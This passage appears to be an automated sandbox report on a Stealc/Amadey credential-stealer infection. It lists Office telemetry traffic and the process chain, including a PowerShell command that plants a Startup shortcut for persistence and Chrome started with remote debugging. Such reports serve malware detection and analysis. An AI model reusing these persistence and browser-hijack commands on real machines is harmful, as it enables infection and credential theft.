                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:28:02 GMT
                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BEAFF0125"
                                                                                                                                                                                                                                                                                        x-ms-request-id: 55c0a6b4-d01e-0082-2dd5-33e489000000
                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                        x-azure-ref: 20241111T153716Z-174f7845968qj8jrhC1EWRh41s000000052g00000000bf41
                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:16 UTC1377INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 37 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4f 75 74 6c 6f 6f 6b 44 65 73 6b 74 6f 70 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a
                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700750" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Desktop" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOutlookDesktop" S="Medium" />


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                        148192.168.2.44990613.107.246.45443
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:16 UTC192OUTGET /rules/rule700751v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:16 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:37:16 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                        Content-Length: 1414
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BE03B051D"
                                                                                                                                                                                                                                                                                        x-ms-request-id: 1815f977-001e-0028-66d5-33c49f000000
                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                        x-azure-ref: 20241111T153716Z-174f7845968frfdmhC1EWRxxbw00000005800000000057yv
                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:16 UTC1414INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 37 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e
                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700751" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Desktop.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                        149192.168.2.44990413.107.246.45443
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:16 UTC192OUTGET /rules/rule700151v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:16 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:37:16 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                        Content-Length: 1399
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BE0A2434F"
                                                                                                                                                                                                                                                                                        x-ms-request-id: 3ca8cbb8-201e-0096-48d5-33ace6000000
                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                        x-azure-ref: 20241111T153716Z-174f78459685726chC1EWRsnbg000000052000000000s86a
                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:16 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 6e 65 4e 6f 74 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4f 6e
                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.OneNote.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOn


                                                                                                                                                                                                                                                                                        Statistics

                                                                                                                                                                                                                                                                                        CPU Usage

                                                                                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                                                                                        Memory Usage

                                                                                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                                                                                        High Level Behavior Distribution

                                                                                                                                                                                                                                                                                        Click to dive into process behavior distribution

                                                                                                                                                                                                                                                                                        Behavior

                                                                                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                                                                                        System Behavior

                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                        Target ID:0
                                                                                                                                                                                                                                                                                        Start time:10:35:57
                                                                                                                                                                                                                                                                                        Start date:11/11/2024
                                                                                                                                                                                                                                                                                        Path:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                        Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                                                                                                                                                                                                                        Imagebase:0xb50000
                                                                                                                                                                                                                                                                                        File size:1'802'752 bytes
                                                                                                                                                                                                                                                                                        MD5 hash:FE83CBC9270910772B2028F38444BB7F
                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.1685179886.0000000004C50000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1958673273.0000000000C1C000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1958673273.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1958471071.00000000009CE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                        Target ID:1
                                                                                                                                                                                                                                                                                        Start time:10:36:03
                                                                                                                                                                                                                                                                                        Start date:11/11/2024
                                                                                                                                                                                                                                                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default"
                                                                                                                                                                                                                                                                                        Imagebase:0x7ff76e190000
                                                                                                                                                                                                                                                                                        File size:3'242'272 bytes
                                                                                                                                                                                                                                                                                        MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                        Target ID:3
                                                                                                                                                                                                                                                                                        Start time:10:36:04
                                                                                                                                                                                                                                                                                        Start date:11/11/2024
                                                                                                                                                                                                                                                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2500 --field-trial-handle=2348,i,5535902685194765974,17004954160592938984,262144 /prefetch:8
                                                                                                                                                                                                                                                                                        Imagebase:0x7ff76e190000
                                                                                                                                                                                                                                                                                        File size:3'242'272 bytes
                                                                                                                                                                                                                                                                                        MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                        Target ID:7
                                                                                                                                                                                                                                                                                        Start time:10:36:22
                                                                                                                                                                                                                                                                                        Start date:11/11/2024
                                                                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                        Commandline:"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\DocumentsDGHCBAAEHC.exe"
                                                                                                                                                                                                                                                                                        Imagebase:0x240000
                                                                                                                                                                                                                                                                                        File size:236'544 bytes
                                                                                                                                                                                                                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                        Target ID:8
                                                                                                                                                                                                                                                                                        Start time:10:36:22
                                                                                                                                                                                                                                                                                        Start date:11/11/2024
                                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                        Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                        Target ID:9
                                                                                                                                                                                                                                                                                        Start time:10:36:22
                                                                                                                                                                                                                                                                                        Start date:11/11/2024
                                                                                                                                                                                                                                                                                        Path:C:\Users\user\DocumentsDGHCBAAEHC.exe
                                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                        Commandline:"C:\Users\user\DocumentsDGHCBAAEHC.exe"
                                                                                                                                                                                                                                                                                        Imagebase:0x240000
                                                                                                                                                                                                                                                                                        File size:3'183'104 bytes
                                                                                                                                                                                                                                                                                        MD5 hash:219DA011BAD6CA9985808A7B2EF7C533
                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000009.00000002.2044754812.0000000000241000.00000040.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                                                                                                                                        • Detection: 100%, Avira
                                                                                                                                                                                                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                        Target ID:10
                                                                                                                                                                                                                                                                                        Start time:10:36:29
                                                                                                                                                                                                                                                                                        Start date:11/11/2024
                                                                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
                                                                                                                                                                                                                                                                                        Imagebase:0x2f0000
                                                                                                                                                                                                                                                                                        File size:3'183'104 bytes
                                                                                                                                                                                                                                                                                        MD5 hash:219DA011BAD6CA9985808A7B2EF7C533
                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000A.00000002.2075058050.00000000002F1000.00000040.00000001.01000000.0000000E.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                                                                                                                                        • Detection: 100%, Avira
                                                                                                                                                                                                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                        Target ID:11
                                                                                                                                                                                                                                                                                        Start time:10:37:00
                                                                                                                                                                                                                                                                                        Start date:11/11/2024
                                                                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                        Commandline:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                        Imagebase:0x2f0000
                                                                                                                                                                                                                                                                                        File size:3'183'104 bytes
                                                                                                                                                                                                                                                                                        MD5 hash:219DA011BAD6CA9985808A7B2EF7C533
                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                        Target ID:12
                                                                                                                                                                                                                                                                                        Start time:10:37:10
                                                                                                                                                                                                                                                                                        Start date:11/11/2024
                                                                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\1005552001\pidgeon.exe
                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\1005552001\pidgeon.exe"
                                                                                                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                                                                                                        File size:17'547'264 bytes
                                                                                                                                                                                                                                                                                        MD5 hash:27DA32557EF397101BD519D5A3E00180
                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                        Programmed in:Borland Delphi
                                                                                                                                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                                                                                                                                        • Detection: 9%, ReversingLabs
                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                        Target ID:13
                                                                                                                                                                                                                                                                                        Start time:10:37:12
                                                                                                                                                                                                                                                                                        Start date:11/11/2024
                                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                        Commandline:powershell -Command "$ws = New-Object -ComObject WScript.Shell; $s = $ws.CreateShortcut('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tyds.lnk'); $s.TargetPath = 'C:\Users\user\AppData\Local\Temp\1005552001\pidgeon.exe'; $s.Save()"
                                                                                                                                                                                                                                                                                        Imagebase:0x7ff788560000
                                                                                                                                                                                                                                                                                        File size:452'608 bytes
                                                                                                                                                                                                                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                        Target ID:14
                                                                                                                                                                                                                                                                                        Start time:10:37:12
                                                                                                                                                                                                                                                                                        Start date:11/11/2024
                                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                        Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                        Target ID:15
                                                                                                                                                                                                                                                                                        Start time:10:37:15
                                                                                                                                                                                                                                                                                        Start date:11/11/2024
                                                                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\1005561001\crypted.exe
                                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\1005561001\crypted.exe"
                                                                                                                                                                                                                                                                                        Imagebase:0x800000
                                                                                                                                                                                                                                                                                        File size:3'186'688 bytes
                                                                                                                                                                                                                                                                                        MD5 hash:1DA8B17CBBAEC15188A82B2339A7977F
                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                                                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                                                                        • Detection: 34%, ReversingLabs
                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                        Target ID:16
                                                                                                                                                                                                                                                                                        Start time:10:37:15
                                                                                                                                                                                                                                                                                        Start date:11/11/2024
                                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                        Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                        Target ID:18
                                                                                                                                                                                                                                                                                        Start time:10:37:18
                                                                                                                                                                                                                                                                                        Start date:11/11/2024
                                                                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\1005561001\crypted.exe
                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\1005561001\crypted.exe"
                                                                                                                                                                                                                                                                                        Imagebase:0x800000
                                                                                                                                                                                                                                                                                        File size:3'186'688 bytes
                                                                                                                                                                                                                                                                                        MD5 hash:1DA8B17CBBAEC15188A82B2339A7977F
                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                        Target ID:19
                                                                                                                                                                                                                                                                                        Start time:10:37:18
                                                                                                                                                                                                                                                                                        Start date:11/11/2024
                                                                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\1005561001\crypted.exe
                                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\1005561001\crypted.exe"
                                                                                                                                                                                                                                                                                        Imagebase:0x800000
                                                                                                                                                                                                                                                                                        File size:3'186'688 bytes
                                                                                                                                                                                                                                                                                        MD5 hash:1DA8B17CBBAEC15188A82B2339A7977F
                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                        Target ID:22
                                                                                                                                                                                                                                                                                        Start time:10:37:19
                                                                                                                                                                                                                                                                                        Start date:11/11/2024
                                                                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 1216 -s 320
                                                                                                                                                                                                                                                                                        Imagebase:0xcc0000
                                                                                                                                                                                                                                                                                        File size:483'680 bytes
                                                                                                                                                                                                                                                                                        MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                        Target ID:23
                                                                                                                                                                                                                                                                                        Start time:10:37:20
                                                                                                                                                                                                                                                                                        Start date:11/11/2024
                                                                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exe
                                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exe"
                                                                                                                                                                                                                                                                                        Imagebase:0x5d0000
                                                                                                                                                                                                                                                                                        File size:3'135'488 bytes
                                                                                                                                                                                                                                                                                        MD5 hash:FAD8A273ED15C30E16C4BA0C776A9727
                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000017.00000002.2794500824.0000000005E01000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000017.00000003.2614055476.00000000010DC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000017.00000002.2781937104.0000000001087000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000017.00000003.2597683395.00000000010EC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000017.00000003.2614392992.00000000010DC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
